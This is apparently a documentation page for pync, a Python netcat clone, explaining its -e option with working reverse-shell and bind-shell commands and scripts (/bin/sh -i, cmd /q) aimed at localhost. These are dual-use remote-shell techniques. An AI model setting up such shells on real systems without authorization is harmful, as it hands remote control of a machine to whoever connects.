Remote Command Execution#
Warning
The -e option allows you to execute a process and have that process’ stdin/stdout/stderr be connected to the network socket.
Any data coming in from the network will go to the process’ stdin and any data coming from the process’ stdout/stderr will go out to the network.
For example, we can create an interactive shell to execute commands on a remote machine.
A Simple Reverse Shell#
Create a local server that will listen for the reverse shell connection:
pync -vl localhost 8000
py -m pync -vl localhost 8000
import pync
pync.run('-vl localhost 8000')
On another console, connect back to the server and execute the shell:
pync -ve "/bin/sh -i" localhost 8000
py -m pync -ve "cmd /q" localhost 8000
# reverse_shell.py
import platform
import pync
command = '/bin/sh -i'
if platform.system() == 'Windows':
command = 'cmd /q'
pync.run('-ve "{}" localhost 8000'.format(command))
There should now be a prompt on the server console that allows you to remotely execute commands on the client machine.
A Simple Bind Shell#
Create a server on port 8000 that executes the shell upon connection:
pync -vle "/bin/sh -i" localhost 8000
py -m pync -vle "cmd /q" localhost 8000
# bind_shell.py
import platform
import pync
command = '/bin/sh -i'
if platform.system() == 'Windows':
command = 'cmd /q'
pync.run('-vle "{}" localhost 8000'.format(command))
On another console, connect to the server to interact with the shell:
pync -v localhost 8000
py -m pync -v localhost 8000
import pync
pync.run('-v localhost 8000')
There should now be a prompt on the client console that allows you to remotely execute commands on the server machine.
- SEE ALSO: